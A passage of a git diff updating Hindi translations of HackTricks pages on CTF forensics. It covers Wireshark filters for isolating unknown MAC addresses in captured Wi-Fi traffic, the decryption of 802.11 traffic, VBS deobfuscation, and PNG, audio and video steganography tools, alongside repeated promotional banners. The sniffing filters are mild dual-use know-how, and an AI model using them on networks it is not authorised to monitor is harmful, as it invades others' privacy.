यदि आप **MAC पते पहले से जानते हैं तो आप उन्हें आउटपुट से हटा सकते हैं** इस जैसे चेक्स जोड़कर: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
|
||||
यदि आप **MAC पते पहले से जानते हैं तो आप उन्हें आउटपुट से हटा सकते हैं** इस तरह की जाँच जोड़कर: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
|
||||
|
||||
एक बार जब आपने नेटवर्क के अंदर **अज्ञात MAC पते** को पहचान लिया है जो भेजने के लिए आप **फ़िल्टर** जैसे इस जैसे उपयोग कर सकते हैं: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` इसका ट्रैफिक फ़िल्टर करने के लिए। ध्यान दें कि ftp/http/ssh/telnet फ़िल्टर उपयोगी हैं अगर आपने ट्रैफिक को डिक्रिप्ट कर लिया है।
|
||||
एक बार जब आपने नेटवर्क के भीतर **अज्ञात MAC पते** को पहचान लिया है जो भेजने के लिए ट्रैफ़िक का उपयोग कर रहे हैं, तो आप इसका उपयोग कर सकते हैं **फ़िल्टर** जैसे निम्नलिखित: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` इसका ध्यान दें कि ftp/http/ssh/telnet फ़िल्टर उपयोगी होते हैं अगर आपने ट्रैफ़िक को डिक्रिप्ट कर लिया है।
|
||||
|
||||
# ट्रैफिक को डिक्रिप्ट करें
|
||||
# ट्रैफ़िक डिक्रिप्ट करें
|
||||
|
||||
संपादित करें --> वरीयताएँ --> प्रोटोकॉल --> IEEE 802.11--> संपादित
|
||||
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
यहाँ आप विशेष फ़ाइल प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं:
|
||||
यहाँ आप विशेष फ़ाइल-प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं:
|
||||
|
||||
{% page-ref page=".pyc.md" %}
|
||||
|
||||
|
@ -37,16 +38,17 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
|
||||
कुछ चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफ़स्केट करने में उपयोगी हो सकती हैं:
|
||||
|
||||
## echo
|
||||
```bash
|
||||
|
@ -52,16 +53,17 @@ End With
|
|||
|
||||
End Function
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** PRs को **HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,33 +1,35 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
|
||||
</details>
|
||||
|
||||
**PNG फ़ाइलें** **CTF challenges** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिससे वे छिपी हुई डेटा को एम्बेड करने के लिए आदर्श होती हैं। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छिपे हुए जानकारी या असमान्यताएँ प्रकट करते हैं।
|
||||
|
||||
PNG फ़ाइल की अखंडता की जाँच और क्षति को ठीक करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएँ एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNGs को मरम्मत करने** में, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
|
||||
|
||||
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छिपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्त करने में मदद करती हैं।
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 **डिस्कॉर्ड समूह** (https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** (https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**PNG फ़ाइलें** **CTF चैलेंज** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिन्हें छुपी डेटा को एम्बेड करने के लिए आदर्श बनाया गया है। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छुपे जानकारी या विसंगतियों को प्रकट करते हैं।
|
||||
|
||||
PNG फ़ाइल की अखंडता की जाँच करने और क्षति को मरम्मत करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो ऑनलाइन सेवाएं जैसे [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) कोरप्टेड PNG की मरम्मत के लिए एक वेब-आधारित समाधान प्रदान करती हैं, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
|
||||
|
||||
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छुपे या खोए गए डेटा को खोजने और पुनर्प्राप्त करने में मदद करती हैं।
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 **डिस्कॉर्ड समूह** (https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** (https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,40 +1,14 @@
|
|||
<details>
|
||||
{% hint style="success" %}
|
||||
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक मुख्य तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग करके गुप्त संदेशों को छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं।
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण करने के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ को खोजने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गाने को धीमा करना या उलटा करना छिपे संदेशों का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
**कम सांकेतिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का शोषण करता है ताकि डेटा को गुप्त रूप से समाहित किया जा सके। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
वीडियो चैलेंज अक्सर ऑडियो और वीडियो स्ट्रीम्स को बंडल करने वाले कंटेनर फ़ॉर्मेट्स को शामिल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेट्स का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
|
||||
|
||||
</details>
|
||||
यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को दर्शाता है, जहां प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा को खोलने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
|
||||
|
||||
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक महत्वपूर्ण तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं।
|
||||
|
||||
ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गानों को धीमा करना या उलटना छुपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
|
||||
|
||||
**कम सार्वजनिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग गुप्त रूप से डेटा समाहित करने के लिए करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
|
||||
|
||||
वीडियो चैलेंज अक्सर कंटेनर फ़ॉर्मेट का सामाग्री जोड़ने वाले होते हैं जो ऑडियो और वीडियो स्ट्रीम्स को बंडल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेटों का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
|
||||
|
||||
यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को प्रकट करता है, जहाँ प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा का पता लगाने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,27 +1,46 @@
|
|||
# ZIPs tricks
|
||||
# ZIPs ट्रिक्स
|
||||
|
||||
